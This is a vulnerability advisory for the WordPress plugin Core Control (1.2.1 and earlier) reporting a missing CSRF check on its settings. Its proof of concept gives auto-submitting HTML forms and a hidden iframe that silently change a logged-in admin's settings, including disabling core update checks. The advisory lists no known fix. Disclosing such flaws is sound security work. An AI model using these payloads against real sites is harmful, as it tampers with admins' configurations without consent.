WordPress Plugin Vulnerabilities

Core Control <= 1.2.1 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin-post.php?action=core_control-modules" method="POST">
    <input type="text" name="check-all" value="on">
    <input type="text" name="checked[]" value="core_control_filesystem.php">
    <input type="text" name="checked[]" value="core_control_http.php">
    <input type="text" name="checked[]" value="core_control_updates.php">
    <input type="text" name="checked[]" value="core_control_http_log.php">
    <input type="text" name="checked[]" value="core_control_cron.php">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-post.php?action=core_control-updates" method="POST">
    <input type="text" name="disable-core-check" value="Disable Core update checks">
</form>
<script>
    document.getElementById("test").submit();
</script>


<iframe src="https://example.com/wp-admin/admin-post.php?action=core_control-fs&module_action=disabletransport&transport=ftpext" width="0" height="0" frameborder="0"></iframe>

Affects Plugins

No known fix

References

Classification

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-05-23 (about 1 years ago)
Added
2022-05-23 (about 1 years ago)
Last Updated
2023-02-20 (about 1 years ago)

Other